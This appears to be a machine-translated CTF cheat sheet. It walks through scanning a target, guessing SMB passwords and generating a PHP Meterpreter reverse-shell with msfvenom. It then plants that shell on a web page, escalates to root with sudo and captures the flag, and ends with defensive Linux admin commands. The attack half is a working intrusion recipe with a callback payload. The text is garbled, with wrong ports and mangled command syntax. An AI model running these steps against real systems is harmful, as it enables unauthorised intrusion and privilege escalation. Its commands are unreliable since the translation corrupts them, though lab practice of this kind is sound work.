: Scanning the other the IP
the ifconfig (first acquire its own the IP)
netdiscover -R & lt 192.168.0.1/24 (IP 1 ~ 124 to scan)
after acquiring the IP:
nmap -sV 192.168.0.104 (port scan)
nmap -v -A -T4 192.168 .0.104 (TCP port scan)
Port:
22: SSH
21: the FTP
23: the Telnet
80: HTTP
433: HTTPS
3306: MySQL
if Samba service opened:
smbclinet -L 192.168.0.104 (see directory)
smbclinet '\\ 192.168.0.104 \ Print $' (enter Catalog $ Print)
(one by one test) (weak password guessing)
after entering if:
gET a.txt (you can get a.txt file)
MySQL -h -u Admin -p 192.168.0.104 (database connections)
(password) (password may be hidden in a file)
searchsploit Samba smbd 3.x - 4.x (search)
DIRB http://192.168.0.104 (scanning web)
into the site
Login Admin
use msf to set the payload
msfconsole
use exploit / Multi / Handler
PHP payload the SET / Meterpreter / reverse_tcp
Show Options (view)
the SET lhost (ip)
the SET lport (ip)
RUN (listen)
-p php msfvenom / Meterpreter / reverse_tcp lhost = (ip) lport = (ip) -f RAW
(Trojan generate php shell)
to copy and paste the Trojans to a certain php page, and then find ways to trigger the vulnerability, by accessing the php, to trigger vulnerability
after the trigger success:
msf in the shell
put right:
the above mentioned id (see the current user uid)
Python -c "Import Pty; pty.spawn ( '/ bin / bash')"
CAT / etc / passwd (get user)
su (the user ) (to find their own password)
sudo put right the -l
sudo su
enter the Find flag, generally /root/proot.txt
CAT proot.txt
submitted Flag!
SSH operating
ssh <-p port> Login username @IP //
scp file path user name @IP: // storage path on the ssh server to transfer files to the
backup web directory
tar -zcvf web.tar.gz / var / www / html /
user management
w // view the current user
pkill -kill -t <user tty > // kicked currently logged in user
process management
ps aux | grep pid or process name // View process
View network connections and processes established
netstat -antulp | grep EST
View a designated port is occupied by what process
lsof -i: port number or netstat -tunlp | grep port number
End Process command
the kill PID
killall <process name>
the kill -9 <PID >
iptables command
to block an IP or ip segment, such as: 123.4.5.6
iptables the -I the INPUT -s 123.4.5.6 -j DROP
iptables the -I 123.4.5.1/24 the INPUT -s -j DROP
prohibit remote access from a host ssh login to the machine, such as 123.4.5.6
Iptable the INPUT -s -t filter -A -p TCP 123.4.5.6 22 is --dport the DROP -j
mysql database operations
backup mysql database
mysqldump -u username -p password database name> back. sql // designated backup database
mysqldump --all-databases> bak.sql // backups of all databases
restore mysql database
mysql -u username -p password database name <bak.sql
security check
find / * .php -perm 4777 // Find php file permissions 777
awk -F: '{if ($ 3 == 0) print $ 1}' / etc / passwd // root privileges to view account
crontab -l // See scheduled tasks
detecting the number of connections and all tcp state
netstat -ant | awk '{print $ 5 "\ t" $ 6}' | grep "[1-9] [0-9] * \." | sed -e 's / :: ffff: // '-e' s /: [0-9] * // '| sort | uniq -c | sort -rn
view the page views of the top ten IP
CAT / var / log / apache2 / access .log | cut -f1 -d "" | sort | uniq -c | sort -k 1 -r | head -10
View page views top ten of the URL of
CAT /var/log/apache2/access.log | Cut -F4 -d "" | Sort | uniq -c | sort -k 1 -r | head -10
search sites brief information about
curl --head website
xprobe2 -v site
nmap []
-A display detailed version information
-v displays detailed information
-o display other operating system
Matego
Web vulnerability discovery (http scanning)
webshag
w3af --- (powerful professional tools)
OWASP ZAP is equivalent to w3af WEB scan tool
injection tool
sqlMap
SEToolkit (***** cattle Tool)